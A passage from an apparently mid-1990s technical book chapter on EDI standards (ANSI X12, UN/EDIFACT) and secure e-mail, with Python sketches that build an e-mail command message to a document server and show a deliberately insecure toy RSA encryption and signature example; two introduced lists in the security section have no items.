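def build_command_message(sender: str, server: str,
                          commands: Sequence[str]) -> EmailMessage:
    """Build a plain-text message whose body holds one command per line."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = server
    # The commands go in the body, so no subject line is set here.
    msg.set_content("\n".join(commands) + "\n")
    return msg


request = build_command_message(
    "webmaster@example.com",          # placeholder sender address
    "itudoc@itu.ch",
    ["START", "GET ITU-1900", "END"],
)
print(request)
```

The sketch only builds the message. To send it, you would typically hand it to the send_message method of an smtplib.SMTP connection to your own mail host. The same helper fits the one-line subscription messages given in the notes earlier in this section.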

ASC X12  The U.S. standards accrediting body is ANSI. ANSI defines EDI through its Accredited Standards Committee X12, and the EDI standard has taken on the name of that committee.

CAUTION
The ANSI EDI standards are voluminous. Before investing in EDI software, get the help of a good consultant; before writing any EDI software of your own, read the standards. The X12 standard is available from
Data Interchange Standards Association, Inc.
1800 Diagonal Road, Suite 200
Alexandria, Virginia 22314-2852
Voice: 1-703-548-7005
FAX: 1-703-548-5738

TIP
For more information on X12, subscribe to the x12g and x12c-impdef mailing lists. For the former, send e-mail to x12g-request@snad.ncsl.nist.gov with the following message:
subscribe x12g
For the latter, send e-mail to x12c-impdef-request@snad.ncsl.nist.gov with the following message:
subscribe x12c-impdef

The Grand Unification  UN/EDIFACT and X12 are due to be merged, and many firms already are using one of these two standards as the basis for their in-house standard. Subscribe to the EDI mailing lists mentioned earlier or work with an EDI-mapping software developer (some points of contact are coming up in the next section) to find out which standards may apply to your firm and your trading partners.

Secure E-Mail

EDI is associated with real money and is a natural target for thieves. Here are a few ways that a thief can take advantage of unsecured EDI:

To combat these problems, EDI needs two kinds of security:

Both needs can be met using the public key encryption systems that were introduced earlier in the chapter.
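
As a reminder of how a public key system supports both encryption and digital signatures, here is a toy sketch of textbook RSA in Python. It is an illustration under loud assumptions: the primes are tiny, there is no padding, and the digest is reduced to fit the small modulus, so it offers no real security. It is not how PGP or PEM is implemented, and the function names are hypothetical.

```python
import hashlib

# Toy key pair built from two small primes. Real keys use primes that
# are hundreds of digits long; these values are for illustration only.
p, q = 61, 53
n = p * q                  # public modulus
phi = (p - 1) * (q - 1)
e = 17                     # public exponent
d = pow(e, -1, phi)        # private exponent (needs Python 3.8 or later)


def encrypt(number: int) -> int:
    """Encrypt a small integer (less than n) with the public key."""
    return pow(number, e, n)


def decrypt(cipher: int) -> int:
    """Recover the integer with the private key."""
    return pow(cipher, d, n)


def digest_as_int(message: bytes) -> int:
    """Hash the message and reduce it so it fits the toy modulus."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message: bytes) -> int:
    """Sign by applying the private exponent to the message digest."""
    return pow(digest_as_int(message), d, n)


def verify(message: bytes, signature: int) -> bool:
    """Check a signature using only the public key."""
    return pow(signature, e, n) == digest_as_int(message)


invoice = b"Pay 100 units to account 42"
signature = sign(invoice)
print(decrypt(encrypt(65)) == 65)     # encryption round trip
print(verify(invoice, signature))     # genuine message verifies
```

Encryption uses the recipient's public key, so only the holder of the private key can read the message; signing uses the sender's private key, so anyone with the public key can check who sent the message and that it was not altered.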

NOTE
Netscape Communications Corporation has announced that Navigator 4.0 (codenamed Galileo) will have built-in secure e-mail. Given Netscape's dominant position in the marketplace, this move is sure to make secure e-mail ubiquitous by 1997.

PGP  Recall that PGP (Pretty Good Privacy) is a private implementation of public key cryptography by Phil Zimmermann. His software is widely available in the U.S. and overseas, and a commercial version also is available.

PGP can provide encryption and digital signatures, as well as encryption of local files using a secret key algorithm.

The PGP code is open for inspection and has been vetted thoroughly. It's not based on open standards (Internet RFCs), however, so it's not often named as part of an EDI or near-EDI communications standard.

PEM  Privacy-Enhanced Mail (PEM) is defined in RFCs 1421 through 1424. PEM provides three major sets of features: